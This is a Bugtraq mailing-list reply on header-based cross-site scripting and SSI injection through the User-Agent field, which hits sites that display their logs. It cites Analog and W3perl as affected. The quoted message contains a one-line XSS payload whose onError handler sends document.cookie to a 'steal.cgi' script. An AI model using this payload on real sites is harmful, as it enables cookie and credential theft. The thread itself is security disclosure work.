Re: XSS And Headers...

[zeno <bugtraq () cgisecurity net>]

> normally it would contain something like... Mozilla/4.0 (compatible; MSIE 
> 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
> ..
>
> but with a proxy prog (i use proxomitron) you can change it to whatever you 
> like..
>
> for example: <img src="x.jpg" 
> onError="this.src='steal.cgi?document.cookie';">
>
> and if the site logs it, you just got the administrators password:)
>
> Now, im yet to come across any sites that this works on because i just 
> thought of it this afternoon but let me know if it works:) in any case, a 
> lot of sites would log/store this kind of information so it should be fixed.


A hole in Analog and W3perl suffered from this problem. I'm sure
other software does. 

I have personally found a example of
 SSI tag inserting using this method on 1 website running "product unknown".
I inserted SSI into the User agent field and visit the site which displayed
the logs in a ssi page. It executed the ssi tag in which I inserted.

I just wrote a paper on cookie theft with xss
that may be worth a peek to you.

www.cgisecurity.com/articles/xss-faq.shtml

Also see
http://www.cgisecurity.net/papers/header-based-exploitation.txt

- zeno () cgisecurity com

> _________________________________________________________________
> MSN Photos is the easiest way to share and print your photos: 
> http://photos.msn.com/support/worldwide.aspx